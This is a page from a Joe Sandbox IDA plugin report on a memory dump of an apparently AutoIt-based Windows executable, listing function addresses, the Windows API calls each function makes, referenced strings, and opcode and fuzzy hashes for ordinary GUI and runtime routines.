Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 99a297942f6e4d7a1e196ccba8fb0a85824b44397bc8bcf7f3dcadd586fc0961
Instruction ID: e64045dbbed37162ad9bd3d29b9de7ba24dc0a4f8193766ae01f827bbad1dc25
Opcode Fuzzy Hash: 99a297942f6e4d7a1e196ccba8fb0a85824b44397bc8bcf7f3dcadd586fc0961
Instruction Fuzzy Hash: B9118E7161020CBBEF258E58DC80FFB376BEB893A4F108125FA1897290D675AD518BA0

Function 006F970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 006AC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006AC657
Part of subcall function 006AC619: GetStockObject.GDI32(00000011), ref: 006AC66B
Part of subcall function 006AC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 006AC675

GetWindowRect.USER32(00000000,?), ref: 006F9775
GetSysColor.USER32(00000012), ref: 006F978F

Strings

static, xrefs: 006F9752

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 58e9c3c44206fa451faecd8cbeaf9c182ab179c42fb636c6c19315ade359db62
Instruction ID: c3109add1149d1e215c48b570939fb3756756dacb608c1e6f66bca49a32ca496
Opcode Fuzzy Hash: 58e9c3c44206fa451faecd8cbeaf9c182ab179c42fb636c6c19315ade359db62
Instruction Fuzzy Hash: FA113A72520209AFDB04EFB8CC45EFA7BB9EB08354F014529FA55D3250E779E851DB60

Function 006F9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006F94A6
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006F94B5

Strings

edit, xrefs: 006F948A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: bbf11c9d0bb5d045ce4912694bd55570d46abb44d08c202feeb1b8d4b6f4884b
Instruction ID: 4b4cd2ac9422b42c8ed6792f97956bdaea9a5fc012ef3592db5f64c638916175
Opcode Fuzzy Hash: bbf11c9d0bb5d045ce4912694bd55570d46abb44d08c202feeb1b8d4b6f4884b
Instruction Fuzzy Hash: F5116071500108AFEB108E68DC41FFB3BAAEB15374F508724FA65932D0C675DC569B64

Function 006D5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D5CF3
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006D5D12

Strings

0, xrefs: 006D5CEC

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 91ea83259d8f390cf81152bbcfc647b82ea89289cab3aa98f5e1be4e9cc99629
Instruction ID: 1405fc6d497242b5f2882a425907a0bbc55bef06d7e466cd93162a819b706cd8
Opcode Fuzzy Hash: 91ea83259d8f390cf81152bbcfc647b82ea89289cab3aa98f5e1be4e9cc99629
Instruction Fuzzy Hash: F3118E72D11618ABDB30DA58D848BD977EBAF06354F184027ED42EB390D770AD05C7A5

Function 006E53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006E544C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006E5475

Strings

<local>, xrefs: 006E543D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 510b2ed3c3c0ef8bf5f8200fa04adc90f58d22bc2ea51050d083fe15959a2b78
Instruction ID: 617a7093a70212ffdb8e77ad3fe33fad16628115a381ddee532fc6aee2810cff
Opcode Fuzzy Hash: 510b2ed3c3c0ef8bf5f8200fa04adc90f58d22bc2ea51050d083fe15959a2b78
Instruction Fuzzy Hash: 5711C470142761FADB248F528884EEABB9AEF1275AF10812AF506821C0E3705991C6B0

Function 006BB4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006C4557
___raise_securityfailure.LIBCMT ref: 006C463E

Strings

(u, xrefs: 006C4639

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (u
API String ID: 3761405300-1558066612
Opcode ID: 53b2e23763ea95e70aebc69fe88c830c5d01a54c07a6f465ee20841ad4ffe330
Instruction ID: 68fe09e403fccc4b1e4039a9679f0add4d7ef35186b5bb8b8ecd7617f230efcb
Opcode Fuzzy Hash: 53b2e23763ea95e70aebc69fe88c830c5d01a54c07a6f465ee20841ad4ffe330
Instruction Fuzzy Hash: 8121E5B56403089BD741EF64E9966D03BB5BB48712F20D82AE904963A0D3F96980CFCD

Function 006EACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(00000000), ref: 006EACF5
htons.WS2_32(00000000), ref: 006EAD32

Strings

255.255.255.255, xrefs: 006EAD0D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: f779162b26b465e2081dcb13998feee00c5040ae1938423f433e0f44fe6e3f2b
Instruction ID: 7edcd7172e6323e27cf3f67c8dec8fcf391a2fa87f67eded0f5673004c6b71c5
Opcode Fuzzy Hash: f779162b26b465e2081dcb13998feee00c5040ae1938423f433e0f44fe6e3f2b
Instruction Fuzzy Hash: 7001C034200345ABCB20AFA9CC46FE9B366EF04720F10852AF5169B3D1D675F805C769

Function 006CC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006CC5E5

Strings

ListBox, xrefs: 006CC5AF
ComboBox, xrefs: 006CC581

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 719e50ded71513c4e24097f9c069ba8dfa42dab416464528d6b729d4cd580f3d
Instruction ID: 90efd99606b8c9bb2d2a55405d89963cf976c9c895eef719ead2a469e71898bd
Opcode Fuzzy Hash: 719e50ded71513c4e24097f9c069ba8dfa42dab416464528d6b729d4cd580f3d
Instruction Fuzzy Hash: E001F171A41118ABCB48EBA8CC52EFE336BEB42360B540A1DF823A32C1DB3468198754

Function 006DC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006DC4EF
__fread_nolock.LIBCMT ref: 006DC504

Strings

EA06, xrefs: 006DC532

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: f9b6184cf213dc2fa2ff9641b0c3efe28f6dc5d13f06c782ba33535f7cd7123d
Instruction ID: 9e0a92f96c62962ec186014e6a430d4324130120eb45b9442c93bb283a0c18de
Opcode Fuzzy Hash: f9b6184cf213dc2fa2ff9641b0c3efe28f6dc5d13f06c782ba33535f7cd7123d
Instruction Fuzzy Hash: 6201F5B2900218BEDB68D7A8C816EFE7BF89B05311F00415EE193D2281E5B4A708CB60

Function 006CC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

SendMessageW.USER32(?,00000180,00000000,?), ref: 006CC4E1

Strings

ListBox, xrefs: 006CC4AB
ComboBox, xrefs: 006CC47D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: 0149a7fe529ed0d24517fd4ecb7501faccb118413e5f93e63f194b290c6c7d6b
Instruction ID: f5dce2b57bf3098260a1752ba501b392ca434c7e161afcb93b67bc193d43e98a
Opcode Fuzzy Hash: 0149a7fe529ed0d24517fd4ecb7501faccb118413e5f93e63f194b290c6c7d6b
Instruction Fuzzy Hash: 4A01F271A41108ABCB48EBA4C962FFF73AEDF01350F14802DF907E32C2DA145E0997A9

Function 006CC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

SendMessageW.USER32(?,00000182,?,00000000), ref: 006CC562

Strings

ListBox, xrefs: 006CC52E
ComboBox, xrefs: 006CC500

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend_memmove
String ID: ComboBox$ListBox
API String ID: 1456604079-1403004172
Opcode ID: e8f6ab4ca42b6c081d169213a7715fcae8e551e546fb55347481584f608aa3f9
Instruction ID: 0aa2de0ebac746635c7fb8af0a5cd1b215691a80dd34f3577a2bafd2768a79f9
Opcode Fuzzy Hash: e8f6ab4ca42b6c081d169213a7715fcae8e551e546fb55347481584f608aa3f9
Instruction Fuzzy Hash: CF012171A40108ABCB40EBA4C912FFF33AEDB01740F54401DF807F32C2DA14AE1AA3A9

Function 006D804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006D806A
_wcscmp.LIBCMT ref: 006D807C

Strings

#32770, xrefs: 006D8076

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: a1b1056f3a3eb4326d699cbd831d474d72f61baa693581378db42f8f3004647d
Instruction ID: f01439e54859ecd6634341a130de148acb5e5974a83f946eb52943fb7bc07af7
Opcode Fuzzy Hash: a1b1056f3a3eb4326d699cbd831d474d72f61baa693581378db42f8f3004647d
Instruction Fuzzy Hash: 87E0D873A0032927D720EAA99C0AED7FBBDEB517A4F00402AF914D3181D7B49A4587D9

Function 006BDA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__umatherr.LIBCMT ref: 006BDA2A

Part of subcall function 006BDD86: __ctrlfp.LIBCMT ref: 006BDDE5

__ctrlfp.LIBCMT ref: 006BDA47

Strings

xnp, xrefs: 006BDA3E, 006BDA0F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __ctrlfp$__umatherr
String ID: xnp
API String ID: 219961500-249092079
Opcode ID: 2bc54a4f828470baf6f647c7059b4a673d4e1d7b905171f6ea168f0ea741319d
Instruction ID: a05d2a0b25c6f90bf3a2d2436f0418c7a9d2556eeed5f6457f183e3dd9513f04
Opcode Fuzzy Hash: 2bc54a4f828470baf6f647c7059b4a673d4e1d7b905171f6ea168f0ea741319d
Instruction Fuzzy Hash: 99E065B140860AAEDB017F80E8066D93BA6EF04310F804095F58C19196EFB684B4D75B

Function 006CB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006CB36B

Part of subcall function 006B2011: _doexit.LIBCMT ref: 006B201B

Strings

Error allocating memory., xrefs: 006CB364
AutoIt, xrefs: 006CB35F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: b51d309735f1860fa163c25a3dd75c936ff02794fa75349112d4bef213b6fa5f
Instruction ID: 74e8177f477edf0b455e4c79cb9389d2a049fcda188ed44ab6a883ead3aae7bb
Opcode Fuzzy Hash: b51d309735f1860fa163c25a3dd75c936ff02794fa75349112d4bef213b6fa5f
Instruction Fuzzy Hash: ACD012B128436832D25972987C17FD56A898F05B51F504019BF4C655C28AD9A9D0429D

Function 0070BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0070BAB8
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0070BCAB

Strings

WIN_XPe, xrefs: 0070BACB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: f714667efa2f3a183d850097f142da4d83779552bbfc3826b6dcc27d8ca435a2
Instruction ID: 95c672c58f17abb40256b28a8ff18ea4ee41797125aacf2c37f4eecd8a1f89d4
Opcode Fuzzy Hash: f714667efa2f3a183d850097f142da4d83779552bbfc3826b6dcc27d8ca435a2
Instruction Fuzzy Hash: 60E0C9B0D0414DEFCB15DBA9C846AECB7F9BB08300F14C59AE022B2191C7795E45DF29

Function 006F84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006F84DF
PostMessageW.USER32(00000000), ref: 006F84E6

Part of subcall function 006D8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006D83CD

Strings

Shell_TrayWnd, xrefs: 006F84D8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7281819a9bf8d8ae53d87ea1528c6417898d37a2119ee1efa3c6f099235542e5
Instruction ID: 3af73ea607dadd2adfc8c6b015a161efd80c3a9404a52e62af2811479f3985bd
Opcode Fuzzy Hash: 7281819a9bf8d8ae53d87ea1528c6417898d37a2119ee1efa3c6f099235542e5
Instruction Fuzzy Hash: DFD023713803107BE77163709C0FFC76604D714B00F014819730D961C0C9E4BC00C618

Function 006F8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006F849F
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006F84B2

Part of subcall function 006D8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006D83CD

Strings

Shell_TrayWnd, xrefs: 006F8498

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
